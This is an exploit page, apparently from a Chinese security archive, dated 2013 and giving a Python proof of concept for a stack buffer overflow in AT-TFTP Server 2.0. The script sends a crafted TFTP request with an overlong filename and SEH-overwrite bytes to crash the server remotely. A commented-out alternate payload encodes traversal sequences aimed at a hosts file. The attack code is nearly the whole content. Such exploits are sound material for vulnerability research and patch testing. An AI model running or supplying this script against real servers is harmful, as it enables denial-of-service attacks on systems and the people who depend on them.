首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS
来源:xis_one@STM Solutions 作者:xis_one 发布时间:2013-04-15  

# Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS
# Date: 12.04.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  http://www.alliedtelesis.com/
# Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1
# Version: 2.0
# Tested on: Windows XP SP3
#
# From 1.9 Remote Exec BOF disovered in 2006 by liuqx@nipc.org.cn  to 2.0 Remote DOS BOF 2013 - no lesson learned.
# Two variants:
#
# 1. SEH overwrite but no exception handler trigger (cookie on stack?)
# 2. Read access violation (non-exploitable?)
#
# Still we can crash the server remotely. 
#
#!/usr/bin/python
import socket
import sys
host = '192.168.1.32'
port = 69

nseh="\xCC\xCC\xCC\xCC"

#seh handler overwritten at 261 byte of shellcode but to exception triggered to use it.
 
seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3


payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00"

#payload to get access violation:
#payload=("\x00\x01\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25"
#"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35"
#"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e"
#"\x00")

buffer="\x00\x01"+  payload + "\x06" + "netascii" + "\x00"


s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(buffer, (host, port))


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KNet Web Server 1.04b - Stack
·MinaliC Webserver 2.0.0 - Buff
·Nagios Remote Plugin Executor
·Ruby Gem md2pdf Command Inject
·Ruby Gem kelredd-pruview 0.3.8
·Free Float FTP Server USER Com
·MongoDB nativeHelper.apply Rem
·SAP ConfigServlet OS Command E
·ircd-hybrid 8.0.5 Denial Of Se
·TP-LINK TL-WR741N / TL-WR741ND
·TRENDNet IP Cam Authentication
·Mikrotik Syslog Server Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved